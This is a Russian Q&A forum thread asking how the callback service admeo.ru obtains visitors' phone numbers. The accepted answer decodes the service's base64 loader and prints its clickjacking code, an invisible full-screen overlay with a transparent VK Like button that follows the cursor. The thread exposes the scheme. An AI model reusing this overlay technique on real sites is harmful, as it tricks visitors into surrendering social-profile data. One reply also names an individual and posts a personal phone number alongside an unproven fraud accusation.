Как admeo.ru узнает номер телефона?

Есть сервис обратного звонка. admeo.ru. Как-то наткнулся на него захожу с (ноута), как бах мне через минуту звонят. ЕСТЕСТВЕННО НОМЕР НЕ УКАЗЫВАЛ
  • Вопрос задан
  • 27528 просмотров
Решения вопроса 1
27cm
@27cm
TODO: Написать статус
Clickjacking

О кликджекинге написано много статей, в том числе и на Хабре, но всё же заглянем внутрь admeo.ru и посмотрим, как это реализовано у них.

1. В коде есть скрипт, буквально бросающийся в глаза:
<script src="data:text/javascript;charset=utf-8;base64,KGZ1bmN0aW9uKGIsYyl7c2V0VGltZW91dChmdW5jdGlvbigpe3ZhciBhPWRvY3VtZW50LGY9YS5nZXRFbGVtZW50c0J5VGFnTmFtZSgic2NyaXB0IilbMF0scz1hLmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpLGg9ZXNjYXBlKGEucmVmZXJyZXIpO3MudHlwZT0idGV4dC9qYXZhc2NyaXB0IjtzLmNoYXJzZXQ9IlVURi04IjtzLmFzeW5jPSEwO3Muc3JjPSIvLyIrYisiLyIrYysiLmpzP3I9IitNYXRoLnJhbmRvbSgpO2YucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUocyxmKX0sMCl9KSgiYWRtZW8ucnUiLCJlZGI0MmE4MTg3MzE4NTY5NmFjNTJlMmJiNGJmNmVlYSIpOw==" async=""></script>

2. Декодируем:
(function(b,c){setTimeout(function(){
var a=document,f=a.getElementsByTagName("script")[0],
s=a.createElement("script"),h=escape(a.referrer);s.type="text/javascript";
s.charset="UTF-8";s.async=!0;s.src="//"+b+"/"+c+".js?r="+Math.random();
f.parentNode.insertBefore(s,f)},0)})("admeo.ru","edb42a81873185696ac52e2bb4bf6eea");

3. Внутри edb42a81873185696ac52e2bb4bf6eea.html:
<html>
<head></head>
<body onclick="admeoVk.click()">
<div id="vk_api_transport"></div>
<div id="cwvkid" style="cursor:pointer!important;clear: both;background: none;position: fixed !important;top: 0;left: 0;bottom: 0;right: 0;width: 100%;height: 100%;border: none;margin: 0;padding: 0;opacity: 0;z-index: 88888;visibility: visible;"></div>
<div id="myvklogin"></div>
<script language="JavaScript">
    var admeoParams = {
        token: 'edb42a81873185696ac52e2bb4bf6eea',
        apiUrl: 'http://admeo.ru/',
        appId: 4906527,
        host: 'admeo.ru',
        siteId: 15,
        cName: 'amuid'
    };

    (function(i,s,o,g,r,a,m){i['AdmeoObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script', 'http://static.admeo.ru/assets/core/_vk.js','admeo');
</script>
</body>
</html>

Странное решение оставить cursor:pointer!important...
4. static.admeo.ru/assets/core/_vk.js
5. Прозрачная кнопка Like Вконтакте движется под курсором и ждёт, когда на неё кликнут:
window.onmousemove = function(e){
    document.querySelector('#cwvkid').style.left = e.pageX - 70;
    document.querySelector('#cwvkid').style.top = e.pageY - 12;
};
Ответ написан
Пригласить эксперта
Ответы на вопрос 12
alexanderkx
@alexanderkx
По мне так это не "вау-эффект" (как они утверждают у себя на сайте), а наоборот после таких "сюрпризов" пропадает всяческое желание работать с компанией, которая пользуется такой "фенечкой".

А получают скорей всего из социальных сетей. Достаточно последнее время распространено.
Ответ написан
mannaro
@mannaro Куратор тега JavaScript
Умею профессионально гуглить
Не знаю. Зашел к ним, просят ввести номер. Никто не звонит.
Ответ написан
Tantacula
@Tantacula
Ларавельщик, витающий в небесах.
Такие сервисы надо в adblock базы или их аналоги добавлять, чтобы эта дрянь не подключалась.
Ответ написан
fillosofik
@fillosofik
любитель интернета
Ну вы даёте, прям расследование устроили)) Скажу по секрету как всё это происходит. Ни с каких социальных сетей никто номера ваши не берёт. У меня на одном из сайтов такое стоит, только по-другому называется, но принцип у всех этих обратных звонков один и тот же.

Если человек сам в этой системе на любом другом сайте заказывал звонок, то его номер и имя записывается в базу, при посещении любого другого сайта где используется эта же кнопка обратной связи, система уже узнаёт клиента по имени и номеру и предлагает владельцу сайта совершить звонок и удивить посетителя. Вот и весь секрет.
Ответ написан
@grivan2
Добрый день! Поработал с компанией Адмео несколько месяцев. Яндекс увидел код на всех трёх сайтах и пессимизировал их в выдаче, пояснив, что это кликджекинг. Адмео дали другой код, который по их словам 100% не отлавливается. Яндекс опять отреагировал через два дня, указав на код. Договорились о возврате денег (остаток 8900). Мурыжили 1.5 месяца, но так ничего и не вернули. Это при почти ежедневных звонках менеджеру и нескольким письмам генеральному директору (Эрдниев Максим Борисович)! За слова отвечаю. Мой тел: 8(926)089-01-78. Будьте осторожны, при возникновении даже не больших проблем, Максим Борисович Эрдниев может Вас кинуть.
Ответ написан
evnuh
@evnuh
Поиск Гугл помог мне, впусти и ты его в свой дом
Окромя забирания телефона из ВК:
8b7884906b7a416d815056dac519e238.PNG
Ответ написан
Sanasol
@Sanasol Куратор тега PHP
нельзя просто так взять и загуглить ошибку
vboro.de/test.php например.

Захват ВК профиля при клике на сайте.
Ответ написан
Quber
@Quber
PHP Team lead
Столько много ответов и ниодного правильного. Ваш номер телефона вы никуда не вводили. Вам это и не нужно делать. Есть два факта:
1. Ваш номер телефона знает ваш оператор.
2. Ваш оператор знает, на какой сайт вы заходите.
Дальше проще. Оператор сотовой связи передает ваш номер телефона сайту, который вы посещаете. Это практикуют все операторы, и МТС, и Билайн, и Мегафон. В интернете есть много инфы по этому поводу. Более того, оператор может оформить вам платную подписку только по одному запросу от сайта партнера.
Ответ написан
Видимо у них какие то специальные алгоритмы для определения номера посетителя, может быть как то через социальные сети.
Ответ написан
Человек сам вводит свои данные, включая телефон, но на другом сайте, который подключён к общей базе данных, а потом получает обратный звонок на этом сайте, где никаких данных не оставлял.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы